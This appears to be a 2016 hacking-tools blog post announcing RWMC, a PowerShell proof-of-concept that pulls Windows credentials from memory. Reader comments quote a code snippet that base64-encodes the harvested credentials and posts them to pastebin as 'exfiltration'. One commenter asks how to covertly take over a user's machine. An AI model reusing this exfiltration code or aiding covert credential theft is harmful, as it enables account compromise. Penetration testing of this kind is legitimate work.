• Skip to main content
  • Skip to primary sidebar
  • Skip to footer
  • Home
  • About Darknet
  • Hacking Tools
  • Popular Posts
  • Darknet Archives
  • Contact Darknet
    • Advertise
    • Submit a Tool
Darknet – Hacking Tools, Hacker News & Cyber Security

Darknet - Hacking Tools, Hacker News & Cyber Security

Darknet is your best source for the latest hacking tools, hacker news, cyber security best practices, ethical hacking & pen-testing.

RWMC – Retrieve Windows Credentials With PowerShell

January 26, 2016

Views: 12,283

RWMC is a Windows PowerShell script written as a proof of concept to Retrieve Windows Credentials using only PowerShell and CDB command-line options (Windows Debuggers).

RWMC - Retrieve Windows Credentials With PowerShell

It allows to retrieve credentials from Windows 2003 to 2012 and Windows 10 (It was tested on 2003, 2008r2, 2012, 2012r2 and Windows 7 – 32 and 64 bits, Windows 8 and Windows 10 Home edition).

The script is different from Mimikatz or WCE because it doesn’t work with system .dlls to decrypt data. All the decryptions are made in the script.

Features

The main features of RWMC:

  • Fully PowerShell
  • Works locally, remotely or from a dump file collected on a machine
  • Doesn’t use .dll files to locate credentials address in memory but a simple Microsoft debugger
  • Doesn’t use OS .dll files to decipher passwords collected (AES, TripleDES, DES-X)
  • Breaks undocumented Microsoft DES-X
  • Works even if you are on a different architecture than the target
  • Leaves no trace in memory

Requirements

To run this script effectively you need:

  • PowerShell 3
  • Allow PowerShell script on you machine, example : Set-ExecutionPolicy Unrestricted -force
  • An Internet Connection

You can download RWMC here:

RWMC-master.zip

Or read more here.

Share
Tweet14
Share138
Buffer
WhatsApp
Email
152 Shares

Filed Under: Hacking Tools, Password Cracking Tools, Windows Hacking Tagged With: Windows Hacking, windows-security



Reader Interactions

Comments

  1. Me says

    January 26, 2016 at 3:53 am

    To run this script effectively you need:
    […]
    An Internet Connection

    Why is an internet connection necessary?

    • Darknet says

      January 26, 2016 at 5:27 pm

      I actually wondered about that too, but honestly haven’t had time to look through the code to figure it out. Perhaps the author will answer here.

    • Sysadmin says

      January 26, 2016 at 10:04 pm

      @Me:
      You should parse ANY script before executing…

      From the RWMC.ps1, it’s calling set-symbolserver.
      (internet access required)
      It’s also using pastebin.com
      (internet access required)

      I’ve stopped there but there’s a bunch of EXE i’d sandbox first and there’s more ps1 files to parse.

    • Batphilt says

      January 27, 2016 at 12:21 am

      There is an option to past the results on pastebin.

      As you can see in the following code snippet:

      $exFiltrate = Read-Host ‘Do you want to exfiltrate the data (pastebin) ?
      1) Yes
      2) No
      0) Exit

      And the associated function:

      if($exFiltrate -eq 1 -and ![string]::IsNullOrEmpty($dev_key)) {
      Write-Progress -Activity “Exfiltrate” -status “Running…” -id 1
      $dataToExfiltrate = Get-Content $logPathName
      $utfEncodedBytes = [System.Text.Encoding]::UTF8.GetBytes($dataToExfiltrate)
      $pasteValue = [System.Convert]::ToBase64String($utfEncodedBytes)
      $pasteName = “PowerMemory (Follow the White Rabbit)”
      $url = “https://pastebin.com/api/api_post.php”
      $parameters = “&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pasteName&api_paste_code=$pasteValue&api_paste_private=0”
      Post-HttpRequest $url $parameters
      }

  2. Soldges says

    January 26, 2016 at 6:07 pm

    if($exFiltrate -eq 1 -and ![string]::IsNullOrEmpty($dev_key)) {
    Write-Progress -Activity “Exfiltrate” -status “Running…” -id 1
    $dataToExfiltrate = Get-Content $logPathName
    $utfEncodedBytes = [System.Text.Encoding]::UTF8.GetBytes($dataToExfiltrate)
    $pasteValue = [System.Convert]::ToBase64String($utfEncodedBytes)
    $pasteName = “PowerMemory (Follow the White Rabbit)”
    $url = “https://pastebin.com/api/api_post.php”
    $parameters = “&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pasteName&api_paste_code=$pasteValue&api_paste_private=0”
    Post-HttpRequest $url $parameters
    }

  3. ab says

    January 26, 2016 at 6:52 pm

    Did this work without Internet ???

  4. giMini says

    January 30, 2016 at 10:06 am

    Hi,

    I’m the author of this script.

    RWMC is not more supported.

    I commited it under PowerMemory suite.

    U can find the supported suite version here : https://github.com/giMini/PowerMemory

    It was presented at HackFest Québec 2015 : https://github.com/giMini/PowerMemory/blob/master/PREZ/HackFest2015.pptx

    The Internet connection is necessary to connect to the symbol server of Microsoft.

    Yes we NEED symbols to locate addresses in memory.

    The pastebin part is there to allow the exfiltration of data in pentest case.

    This can work without Internet connection, you can test it on windows 2016. Actually, I download the server symbols from Microsoft website to prove it.

    giMini

    • Sysadmin says

      February 1, 2016 at 11:54 pm

      @giMini:
      Thanks for the input and the clarification.

      I did attend your presentation @hackfest, that’s some inspired hack.
      If there’s a 2016 edition and I hope you’ll be there.

  5. Derrek Bergman says

    March 4, 2016 at 2:47 am

    A month ago I was able to use the RWMC tool completely fine. Now I can not use the power memory to get the password of a remote machine.  I am a Network Admin who needs to get into a machine and change a user account on the machine to a standard user rather than let them have admin rights.  This way I can log into that machine as Admin change the settings I need and log back in as the correct person and they would have no idea I was ever in the machine.  How do I accomplish that with Power Memory

Primary Sidebar

Search Darknet

  • Email
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Advertise on Darknet

Latest Posts

Falco - Real-Time Threat Detection for Linux and Containers

Falco – Real-Time Threat Detection for Linux and Containers

Views: 328

Security visibility inside containers, Kubernetes, and cloud workloads remains among the hardest … ...More about Falco – Real-Time Threat Detection for Linux and Containers

Wazuh – Open Source Security Platform for Threat Detection, Visibility & Compliance

Wazuh – Open Source Security Platform for Threat Detection, Visibility & Compliance

Views: 623

As threat surfaces grow and attack sophistication increases, many security teams face the same … ...More about Wazuh – Open Source Security Platform for Threat Detection, Visibility & Compliance

Best Open Source HIDS Tools for Linux in 2025 (Compared & Ranked)

Views: 571

With more businesses running Linux in production—whether in bare metal, VMs, or containers—the need … ...More about Best Open Source HIDS Tools for Linux in 2025 (Compared & Ranked)

SUDO_KILLER - Auditing Sudo Configurations for Privilege Escalation Paths

SUDO_KILLER – Auditing Sudo Configurations for Privilege Escalation Paths

Views: 607

sudo is a powerful utility in Unix-like systems that allows permitted users to execute commands with … ...More about SUDO_KILLER – Auditing Sudo Configurations for Privilege Escalation Paths

Bantam - Advanced PHP Backdoor Management Tool For Post Exploitation

Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation

Views: 461

Bantam is a lightweight post-exploitation utility written in C# that includes advanced payload … ...More about Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation

AI-Powered Cybercrime in 2025 - The Dark Web’s New Arms Race

AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race

Views: 690

In 2025, the dark web isn't just a marketplace for illicit goods—it's a development lab. … ...More about AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race

Topics

  • Advertorial (28)
  • Apple (46)
  • Countermeasures (228)
  • Cryptography (82)
  • Database Hacking (89)
  • Events/Cons (7)
  • Exploits/Vulnerabilities (431)
  • Forensics (65)
  • GenAI (3)
  • Hacker Culture (8)
  • Hacking News (229)
  • Hacking Tools (684)
  • Hardware Hacking (82)
  • Legal Issues (179)
  • Linux Hacking (74)
  • Malware (238)
  • Networking Hacking Tools (352)
  • Password Cracking Tools (104)
  • Phishing (41)
  • Privacy (219)
  • Secure Coding (118)
  • Security Software (235)
  • Site News (51)
    • Authors (6)
  • Social Engineering (37)
  • Spammers & Scammers (76)
  • Stupid E-mails (6)
  • Telecomms Hacking (6)
  • UNIX Hacking (6)
  • Virology (6)
  • Web Hacking (384)
  • Windows Hacking (169)
  • Wireless Hacking (45)

Security Blogs

  • Dancho Danchev
  • F-Secure Weblog
  • Google Online Security
  • Graham Cluley
  • Internet Storm Center
  • Krebs on Security
  • Schneier on Security
  • TaoSecurity
  • Troy Hunt

Security Links

  • Exploits Database
  • Linux Security
  • Register – Security
  • SANS
  • Sec Lists
  • US CERT

Footer

Most Viewed Posts

  • Brutus Password Cracker – Download brutus-aet2.zip AET2 (2,298,107)
  • Darknet – Hacking Tools, Hacker News & Cyber Security (2,173,105)
  • Top 15 Security Utilities & Download Hacking Tools (2,096,640)
  • 10 Best Security Live CD Distros (Pen-Test, Forensics & Recovery) (1,199,691)
  • Password List Download Best Word List – Most Common Passwords (933,528)
  • wwwhack 1.9 – wwwhack19.zip Web Hacking Software Free Download (776,171)
  • Hack Tools/Exploits (673,301)
  • Wep0ff – Wireless WEP Key Cracker Tool (530,185)

Search

Recent Posts

  • Falco – Real-Time Threat Detection for Linux and Containers May 19, 2025
  • Wazuh – Open Source Security Platform for Threat Detection, Visibility & Compliance May 16, 2025
  • Best Open Source HIDS Tools for Linux in 2025 (Compared & Ranked) May 14, 2025
  • SUDO_KILLER – Auditing Sudo Configurations for Privilege Escalation Paths May 12, 2025
  • Bantam – Advanced PHP Backdoor Management Tool For Post Exploitation May 9, 2025
  • AI-Powered Cybercrime in 2025 – The Dark Web’s New Arms Race May 7, 2025

Tags

apple botnets computer-security darknet Database Hacking ddos dos exploits fuzzing google hacking-networks hacking-websites hacking-windows hacking tool Information-Security information gathering Legal Issues malware microsoft network-security Network Hacking Password Cracking pen-testing penetration-testing Phishing Privacy Python scammers Security Security Software spam spammers sql-injection trojan trojans virus viruses vulnerabilities web-application-security web-security windows windows-security Windows Hacking worms XSS

Copyright © 1999–2025 Darknet All Rights Reserved · Privacy Policy